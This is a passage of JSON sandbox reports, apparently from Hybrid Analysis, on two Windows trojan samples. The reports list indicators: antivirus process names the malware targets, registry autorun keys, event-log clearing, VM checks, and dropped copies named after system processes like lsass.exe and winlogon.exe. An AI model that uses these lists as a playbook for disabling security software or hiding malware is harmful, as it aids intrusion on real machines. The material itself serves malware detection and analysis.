\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"AvgServ\" (Indicator: \"avgserv\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"persfw.exe\" (Indicator: \"persfw\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"NMain.exe\" (Indicator: \"nmain\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"NAVW32.exe\" (Indicator: \"navw32\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"NISUM.EXE\" (Indicator: \"nisum\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"NAVAPSVC.EXE\" (Indicator: \"navapsvc\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Mpftray.exe\" (Indicator: \"mpftray\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"McShield.exe\" (Indicator: \"mcshield\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"LOCKDOWN2000.EXE\" (Indicator: \"lockdown2000\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"IAMSERV.EXE\" (Indicator: \"iamserv\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"IAMAPP.EXE\" (Indicator: \"iamapp\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"CCSETMGR.EXE\" (Indicator: \"ccsetmgr\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"ccEvtMgr.exe\" (Indicator: \"ccevtmgr\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"avpcc.exe\" (Indicator: \"avpcc\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"avgserv.exe\" (Indicator: \"avgserv\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"avgcc32.exe\" (Indicator: \"avgcc\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"avgcc32.exe\" (Indicator: \"avgcc32\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"apvxdwin.exe\" (Indicator: \"apvxdwin\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Lookout.exe\" (Indicator: \"lookout\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")", "origin": "File/Memory", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-188", "relevance": 5, "name": "Calls APIs used for Remove Service", "description": "Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-406", "type": 2, "relevance": 1, "name": "Contains ability to shutdown system", "description": "Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-579", "type": 2, "relevance": 1, "name": "Contains ability to retrieve remote user information", "description": "Observed string: \"FINGER %s\" (Indicator: \"finger \") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n Observed string: \"Go finger yourself\" (Indicator: \" finger \") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n Observed string: \"Get you finger out of there\" (Indicator: \" finger \") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n Observed string: \"Stick your finger somewhere else\" (Indicator: \" finger \") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n Observed string: \"FINGER\" (Indicator: \"finger\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n Observed string: \"FINGER %s\" (Indicator: \"finger \") in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n Observed string: \"Go finger yourself\" (Indicator: \" finger \") in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n Observed string: \"Get you finger out of there\" (Indicator: \" finger \") in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n Observed string: \"Stick your finger somewhere else\" (Indicator: \" finger \") in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n Observed string: \"FINGER\" (Indicator: \"finger\") in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "stream-106", "type": 1, "relevance": 7, "name": "Contains ability to execute program", "description": "ShellExecuteA@SHELL32.DLL at 00000000-00005224-52447-490-004051C1\n ShellExecuteA@SHELL32.DLL at 00000000-00005224-52447-652-00406E2B\n ShellExecuteA@SHELL32.DLL at 00000000-00005224-52447-346-0040CFCD\n ShellExecuteA@SHELL32.DLL at 00000000-00005224-52447-292-0040B310\n ShellExecuteA@SHELL32.DLL at 00000000-00005224-52447-248-004023E1", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-3", "relevance": 10, "name": "Timestamp in PE header is very old or in the future", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" claims program is from Thu Jan 1 15:30:08 1970", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" claimed CRC 325214 while the actual is CRC 748336", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" has an entrypoint in section \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegDeleteKeyA\n RegCloseKey\n OpenProcessToken\n GetUserNameA\n RegOpenKeyExA\n RegDeleteValueA\n RegCreateKeyExA\n LoadLibraryA\n GetFileAttributesA\n CopyFileA\n GetVersionExA\n GetModuleFileNameA\n GetSystemDirectoryA\n GetFileSize\n OpenProcess\n DeleteFileA\n UnhandledExceptionFilter\n TerminateProcess\n GetCommandLineA\n GetProcAddress\n GetTempPathA\n CreateThread\n GetModuleHandleA\n FindFirstFileA\n GetStartupInfoA\n GetComputerNameA\n FindNextFileA\n ExitThread\n CreateProcessA\n WriteFile\n Sleep\n CreateFileA\n GetTickCount\n VirtualAlloc\n ShellExecuteA\n GetClipboardData\n HttpSendRequestA\n InternetOpenUrlA\n InternetReadFile\n InternetCloseHandle\n InternetOpenA\n InternetConnectA\n InternetCrackUrlA\n WSASocketA\n accept\n WSAStartup\n connect\n closesocket\n send\n listen\n recv\n socket\n bind\n sendto", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "stream-17", "type": 1, "relevance": 10, "name": "Contains ability to download files from the internet", "description": "InternetReadFile@WININET.DLL at 00000000-00005224-52447-346-0040CFCD\n recv@WS2_32.DLL at 00000000-00005224-52447-360-0040E838\n recv@WS2_32.DLL at 00000000-00005224-52447-530-00408C58\n recv@WS2_32.DLL at 00000000-00005224-52447-364-0040ED54\n recv@WS2_32.DLL at 00000000-00005224-52447-362-0040E9D7\n recv@WS2_32.DLL at 00000000-00005224-52447-245-00402059\n recv@WS2_32.DLL at 00000000-00005224-52447-333-0040B935\n recv@WS2_32.DLL at 00000000-00005224-52447-361-0040E95F\n recv@WS2_32.DLL at 00000000-00005224-52447-358-0040E3BB", "origin": "Hybrid Analysis Technology", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "string-184", "type": 2, "relevance": 5, "name": "Found registry location strings which can modify auto-execute functionality", "description": "Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" (Indicator: \"software\\microsoft\\windows\\currentversion\\runservices\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" (Indicator: \"software\\microsoft\\windows\\currentversion\\runservicesonce\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" (Indicator: \"software\\microsoft\\windows\\currentversion\\runservices\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" (Indicator: \"software\\microsoft\\windows\\currentversion\\runonce\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices-\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices-\" (Indicator: \"software\\microsoft\\windows\\currentversion\\runservices\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\Run-\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" (Indicator: \"software\\microsoft\\windows nt\\currentversion\\winlogon\"; in File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" (Indicator: \"software\\microsoft\\windows\\currentversion\\runservices\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" (Indicator: \"software\\microsoft\\windows\\currentversion\\runservicesonce\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" (Indicator: \"software\\microsoft\\windows\\currentversion\\runservices\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" (Indicator: \"software\\microsoft\\windows\\currentversion\\runonce\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices-\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices-\" (Indicator: \"software\\microsoft\\windows\\currentversion\\runservices\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\Run-\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found string \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" (Indicator: \"software\\microsoft\\windows nt\\currentversion\\winlogon\"; in Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" has section name UPX0 with entropy \"6.33637327379\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "stream-109", "type": 1, "relevance": 3, "name": "Contains ability to remove directories", "description": "RemoveDirectoryA@KERNEL32.DLL at 00000000-00005224-52447-338-0041942C", "origin": "Hybrid Analysis Technology", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "stream-7", "type": 1, "relevance": 8, "name": "Contains ability to clear windows event logfiles", "description": "ClearEventLogA@ADVAPI32.DLL at 00000000-00005224-52447-342-0040C57F", "origin": "Hybrid Analysis Technology", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "registry-56", "type": 3, "relevance": 5, "name": "Reads the registry for VMWare specific artifacts", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Path: \"HKLM\\SOFTWARE\\VMWARE, INC.\\VMWARE TOOLS\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "string-43", "type": 2, "relevance": 7, "name": "References security related windows services", "description": "\"wuauserv\" (Indicator: \"wuauserv\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" (Indicator: \"wscsvc\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d", "origin": "File/Memory", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526
https://hybrid-analysis.com/sample/04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526
Hybrid Analysis - Killers
{"size": 163903, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526", "sha256": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526", "av_detect": 94, "vx_family": "Trojan.Regrun", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 136, "extracted_files": [{"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 163903, "sha256": "8ae76db8482a623fe052a0c32c78a7ad7ac35df831dbe3eaf22b1815131044de", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\CSRSS.EXE", "file_size": 163903, "sha256": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%LOCALAPPDATA%\\D3_08.exe", "file_size": 163903, "sha256": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%LOCALAPPDATA%\\IExplorer.exe", "file_size": 163903, "sha256": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 163903, "sha256": "f32ef5543d36573ac60df400d19c805ac18808320a71fe65072d4ad66e652869", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 163903, "sha256": "185391e7160b5d818b8b60e0e2373269a5fc03c93dc426997454bb8d3cff497b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 163903, "sha256": "19981ff11a5e0d2cd5e0ba07af3c67f9e2a71db415120f4362ba067448e1ad2d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 163903, "sha256": "293faba48ca75d09def23a7d6fcc6d3030f88836eee4e52811bc370be053d02a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 163903, "sha256": "e00c1dbd3c36c872f7113de16cbc4d8afddb929642265625c37c960e28fef013", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINLOGON.EXE", "file_size": 163903, "sha256": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "csrss.exe", "file_path": "%LOCALAPPDATA%\\csrss.exe", "file_size": 163903, "sha256": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lsass.exe", "file_path": "%LOCALAPPDATA%\\lsass.exe", "file_size": 163903, "sha256": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services.exe", "file_path": "%LOCALAPPDATA%\\services.exe", "file_size": 163903, "sha256": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "smss.exe", "file_path": "%LOCALAPPDATA%\\smss.exe", "file_size": 163903, "sha256": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_path": "%LOCALAPPDATA%\\winlogon.exe", "file_size": 163903, "sha256": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%WINDIR%\\D3_08.exe", "file_size": 163903, "sha256": "30f3e31be2ed8d6f190663514b6aab6a2f6705ce8bbe05701fbc6a7884803a92", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 163903, "sha256": "9a8795edba2015e33f33d933bdfc43890afb8dbb881aac7b36a3cd30e45344f0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MrD3_08.scr", "file_path": "%WINDIR%\\System32\\MrD3_08.scr", "file_size": 163903, "sha256": "9043345533ef4e2ac40ff74d763e4ce0e746e1913d05ec6130977c9493c375b7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 163903, "sha256": "4ceab5803d899008d656b17d7bfbd31e051d87421b57099fb0427e9bb63294f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "C:\\D3_08.exe", "file_size": 163903, "sha256": "f2d0b2a93a8c64536dcba3b4693fe9fd589e0093e514065668bc26595b681adb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_path": "C:\\D3_08\\New Folder.exe", "file_size": 163903, "sha256": "244e3685a354000a610d187b5a411e864fcb9f59a902ed4c232d65913faaf543", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_path": "C:\\Data %OSUSER%.exe", "file_size": 163903, "sha256": "9e178a678fd5034b527302d4f0324784b9383153113726a2c603876c6423fc37", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe (PID: 940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe.bin", "file_size": 163903, "sha256": "30f3e31be2ed8d6f190663514b6aab6a2f6705ce8bbe05701fbc6a7884803a92", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 163903, "sha256": "f32ef5543d36573ac60df400d19c805ac18808320a71fe65072d4ad66e652869", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": 